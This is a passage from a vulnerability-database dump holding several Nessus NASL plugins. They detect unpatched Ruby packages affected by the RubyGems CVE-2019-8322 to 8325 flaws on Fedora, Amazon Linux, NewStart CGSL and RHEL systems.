script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"ruby-2.5.5-101.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2021-01-01T01:17:05", "description": "An issue was discovered in RubyGems 2.6 and later through 3.0.2. The\ngem owner command outputs the contents of the API response directly to\nstdout. Therefore, if the response is crafted, escape sequence\ninjection may occur. (CVE-2019-8322)\n\nAn issue was discovered in RubyGems 2.6 and later through 3.0.2.\nGem::GemcutterUtilities#with_response may output the API response to\nstdout as it is. Therefore, if the API side modifies the response,\nescape sequence injection may occur. (CVE-2019-8323)\n\nAn issue was discovered in RubyGems 2.6 and later through 3.0.2. Since\nGem::CommandManager#run calls alert_error without escaping, escape\nsequence injection is possible. (There are many ways to cause an\nerror.) (CVE-2019-8325)\n\nAn issue was discovered in RubyGems 2.6 and later through 3.0.2. A\ncrafted gem with a multi-line name is not handled correctly.\nTherefore, an attacker could inject arbitrary code to the stub line of\ngemspec, which is eval-ed by code in ensure_loadable_spec during the\npreinstall check. (CVE-2019-8324)", "edition": 17, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-07-24T00:00:00", "title": "Amazon Linux 2 : ruby (ALAS-2019-1249)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8325", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:rubygem-io-console", "p-cpe:/a:amazon:linux:ruby-debuginfo", "p-cpe:/a:amazon:linux:rubygem-json", "p-cpe:/a:amazon:linux:ruby", "p-cpe:/a:amazon:linux:rubygem-minitest", "p-cpe:/a:amazon:linux:rubygem-rake", "p-cpe:/a:amazon:linux:rubygem-psych", "p-cpe:/a:amazon:linux:rubygems-devel", "p-cpe:/a:amazon:linux:ruby-libs", "cpe:/o:amazon:linux:2", "p-cpe:/a:amazon:linux:ruby-irb", "p-cpe:/a:amazon:linux:rubygem-bigdecimal", "p-cpe:/a:amazon:linux:ruby-devel", "p-cpe:/a:amazon:linux:ruby-doc", "p-cpe:/a:amazon:linux:rubygems", "p-cpe:/a:amazon:linux:ruby-tcltk", "p-cpe:/a:amazon:linux:rubygem-rdoc"], "id": "AL2_ALAS-2019-1249.NASL", "href": "https://www.tenable.com/plugins/nessus/126961", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2019-1249.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126961);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2020/01/06\");\n\n script_cve_id(\"CVE-2019-8322\", \"CVE-2019-8323\", \"CVE-2019-8324\", \"CVE-2019-8325\");\n script_xref(name:\"ALAS\", value:\"2019-1249\");\n\n script_name(english:\"Amazon Linux 2 : ruby (ALAS-2019-1249)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux 2 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An issue was discovered in RubyGems 2.6 and later through 3.0.2. The\ngem owner command outputs the contents of the API response directly to\nstdout. Therefore, if the response is crafted, escape sequence\ninjection may occur. (CVE-2019-8322)\n\nAn issue was discovered in RubyGems 2.6 and later through 3.0.2.\nGem::GemcutterUtilities#with_response may output the API response to\nstdout as it is. Therefore, if the API side modifies the response,\nescape sequence injection may occur. (CVE-2019-8323)\n\nAn issue was discovered in RubyGems 2.6 and later through 3.0.2. Since\nGem::CommandManager#run calls alert_error without escaping, escape\nsequence injection is possible. (There are many ways to cause an\nerror.) (CVE-2019-8325)\n\nAn issue was discovered in RubyGems 2.6 and later through 3.0.2. A\ncrafted gem with a multi-line name is not handled correctly.\nTherefore, an attacker could inject arbitrary code to the stub line of\ngemspec, which is eval-ed by code in ensure_loadable_spec during the\npreinstall check. (CVE-2019-8324)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/AL2/ALAS-2019-1249.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update ruby' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem-minitest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem-rake\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", reference:\"ruby-2.0.0.648-35.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"ruby-debuginfo-2.0.0.648-35.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"ruby-devel-2.0.0.648-35.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"ruby-doc-2.0.0.648-35.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"ruby-irb-2.0.0.648-35.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"ruby-libs-2.0.0.648-35.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"ruby-tcltk-2.0.0.648-35.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"rubygem-bigdecimal-1.2.0-35.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"rubygem-io-console-0.4.2-35.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"rubygem-json-1.7.7-35.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"rubygem-minitest-4.3.2-35.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"rubygem-psych-2.0.0-35.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"rubygem-rake-0.9.6-35.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"rubygem-rdoc-4.0.0-35.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"rubygems-2.0.14.1-35.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"rubygems-devel-2.0.14.1-35.amzn2.0.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby / ruby-debuginfo / ruby-devel / ruby-doc / ruby-irb / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T12:02:50", "description": "The remote NewStart CGSL host, running version CORE 5.05 / MAIN 5.05, has ruby packages installed that are affected by\nmultiple vulnerabilities:\n\n - An issue was discovered in RubyGems 2.6 and later\n through 3.0.2. The gem owner command outputs the\n contents of the API response directly to stdout.\n Therefore, if the response is crafted, escape sequence\n injection may occur. (CVE-2019-8322)\n\n - An issue was discovered in RubyGems 2.6 and later\n through 3.0.2. Gem::GemcutterUtilities#with_response may\n output the API response to stdout as it is. Therefore,\n if the API side modifies the response, escape sequence\n injection may occur. (CVE-2019-8323)\n\n - An issue was discovered in RubyGems 2.6 and later\n through 3.0.2. A crafted gem with a multi-line name is\n not handled correctly. Therefore, an attacker could\n inject arbitrary code to the stub line of gemspec, which\n is eval-ed by code in ensure_loadable_spec during the\n preinstall check. (CVE-2019-8324)\n\n - An issue was discovered in RubyGems 2.6 and later\n through 3.0.2. Since Gem::CommandManager#run calls\n alert_error without escaping, escape sequence injection\n is possible. (There are many ways to cause an error.)\n (CVE-2019-8325)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 17, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-08-12T00:00:00", "title": "NewStart CGSL CORE 5.05 / MAIN 5.05 : ruby Multiple Vulnerabilities (NS-SA-2019-0084)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8325", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "modified": "2019-08-12T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2019-0084_RUBY.NASL", "href": "https://www.tenable.com/plugins/nessus/127299", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2019-0084. The text\n# itself is copyright (C) ZTE, Inc.\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127299);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\n \"CVE-2019-8322\",\n \"CVE-2019-8323\",\n \"CVE-2019-8324\",\n \"CVE-2019-8325\"\n );\n\n script_name(english:\"NewStart CGSL CORE 5.05 / MAIN 5.05 : ruby Multiple Vulnerabilities (NS-SA-2019-0084)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.05 / MAIN 5.05, has ruby packages installed that are affected by\nmultiple vulnerabilities:\n\n - An issue was discovered in RubyGems 2.6 and later\n through 3.0.2. The gem owner command outputs the\n contents of the API response directly to stdout.\n Therefore, if the response is crafted, escape sequence\n injection may occur. (CVE-2019-8322)\n\n - An issue was discovered in RubyGems 2.6 and later\n through 3.0.2. Gem::GemcutterUtilities#with_response may\n output the API response to stdout as it is. Therefore,\n if the API side modifies the response, escape sequence\n injection may occur. (CVE-2019-8323)\n\n - An issue was discovered in RubyGems 2.6 and later\n through 3.0.2. A crafted gem with a multi-line name is\n not handled correctly. Therefore, an attacker could\n inject arbitrary code to the stub line of gemspec, which\n is eval-ed by code in ensure_loadable_spec during the\n preinstall check. (CVE-2019-8324)\n\n - An issue was discovered in RubyGems 2.6 and later\n through 3.0.2. Since Gem::CommandManager#run calls\n alert_error without escaping, escape sequence injection\n is possible. (There are many ways to cause an error.)\n (CVE-2019-8325)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2019-0084\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL ruby packages. Note that updated packages may not be available yet. Please contact ZTE for\nmore information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8324\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/ZTE-CGSL/release\");\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, \"NewStart Carrier Grade Server Linux\");\n\nif (release !~ \"CGSL CORE 5.05\" &&\n release !~ \"CGSL MAIN 5.05\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.05 / NewStart CGSL MAIN 5.05');\n\nif (!get_kb_item(\"Host/ZTE-CGSL/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"NewStart Carrier Grade Server Linux\", cpu);\n\nflag = 0;\n\npkgs = {\n \"CGSL CORE 5.05\": [\n \"ruby-2.0.0.648-35.el7_6\",\n \"ruby-debuginfo-2.0.0.648-35.el7_6\",\n \"ruby-devel-2.0.0.648-35.el7_6\",\n \"ruby-doc-2.0.0.648-35.el7_6\",\n \"ruby-irb-2.0.0.648-35.el7_6\",\n \"ruby-libs-2.0.0.648-35.el7_6\",\n \"ruby-tcltk-2.0.0.648-35.el7_6\",\n \"rubygem-bigdecimal-1.2.0-35.el7_6\",\n \"rubygem-io-console-0.4.2-35.el7_6\",\n \"rubygem-json-1.7.7-35.el7_6\",\n \"rubygem-minitest-4.3.2-35.el7_6\",\n \"rubygem-psych-2.0.0-35.el7_6\",\n \"rubygem-rake-0.9.6-35.el7_6\",\n \"rubygem-rdoc-4.0.0-35.el7_6\",\n \"rubygems-2.0.14.1-35.el7_6\",\n \"rubygems-devel-2.0.14.1-35.el7_6\"\n ],\n \"CGSL MAIN 5.05\": [\n \"ruby-2.0.0.648-35.el7_6\",\n \"ruby-debuginfo-2.0.0.648-35.el7_6\",\n \"ruby-devel-2.0.0.648-35.el7_6\",\n \"ruby-doc-2.0.0.648-35.el7_6\",\n \"ruby-irb-2.0.0.648-35.el7_6\",\n \"ruby-libs-2.0.0.648-35.el7_6\",\n \"ruby-tcltk-2.0.0.648-35.el7_6\",\n \"rubygem-bigdecimal-1.2.0-35.el7_6\",\n \"rubygem-io-console-0.4.2-35.el7_6\",\n \"rubygem-json-1.7.7-35.el7_6\",\n \"rubygem-minitest-4.3.2-35.el7_6\",\n \"rubygem-psych-2.0.0-35.el7_6\",\n \"rubygem-rake-0.9.6-35.el7_6\",\n \"rubygem-rdoc-4.0.0-35.el7_6\",\n \"rubygems-2.0.14.1-35.el7_6\",\n \"rubygems-devel-2.0.14.1-35.el7_6\"\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:\"ZTE \" + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T05:17:36", "description": "An update for ruby is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to perform system\nmanagement tasks.\n\nSecurity Fix(es) :\n\n* rubygems: Installing a malicious gem may lead to arbitrary code\nexecution (CVE-2019-8324)\n\n* rubygems: Escape sequence injection vulnerability in gem owner\n(CVE-2019-8322)\n\n* rubygems: Escape sequence injection vulnerability in API response\nhandling (CVE-2019-8323)\n\n* rubygems: Escape sequence injection vulnerability in errors\n(CVE-2019-8325)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.", "edition": 17, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-16T00:00:00", "title": "RHEL 7 : ruby (RHSA-2019:1235)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8325", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:rubygems", "p-cpe:/a:redhat:enterprise_linux:ruby", "p-cpe:/a:redhat:enterprise_linux:rubygem-rdoc", "p-cpe:/a:redhat:enterprise_linux:rubygem-rake", "p-cpe:/a:redhat:enterprise_linux:ruby-debuginfo", "p-cpe:/a:redhat:enterprise_linux:ruby-irb", "p-cpe:/a:redhat:enterprise_linux:rubygem-bigdecimal", "p-cpe:/a:redhat:enterprise_linux:ruby-doc", "p-cpe:/a:redhat:enterprise_linux:rubygem-psych", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:rubygems-devel", "p-cpe:/a:redhat:enterprise_linux:ruby-libs", "p-cpe:/a:redhat:enterprise_linux:rubygem-json", "p-cpe:/a:redhat:enterprise_linux:ruby-devel", "p-cpe:/a:redhat:enterprise_linux:rubygem-io-console", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:ruby-tcltk", "p-cpe:/a:redhat:enterprise_linux:rubygem-minitest"], "id": "REDHAT-RHSA-2019-1235.NASL", "href": "https://www.tenable.com/plugins/nessus/125201", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:1235. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125201);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2020/01/15\");\n\n script_cve_id(\"CVE-2019-8322\", \"CVE-2019-8323\", \"CVE-2019-8324\", \"CVE-2019-8325\");\n script_xref(name:\"RHSA\", value:\"2019:1235\");\n\n script_name(english:\"RHEL 7 : ruby (RHSA-2019:1235)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for ruby is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to perform system\nmanagement tasks.\n\nSecurity Fix(es) :\n\n* rubygems: Installing a malicious gem may lead to arbitrary code\nexecution (CVE-2019-8324)\n\n* rubygems: Escape sequence injection vulnerability in gem owner\n(CVE-2019-8322)\n\n* rubygems: Escape sequence injection vulnerability in API response\nhandling (CVE-2019-8323)\n\n* rubygems: Escape sequence injection vulnerability in errors\n(CVE-2019-8325)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:1235\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-8322\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-8323\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-8324\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-8325\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-minitest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-rake\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygems\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygems-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif 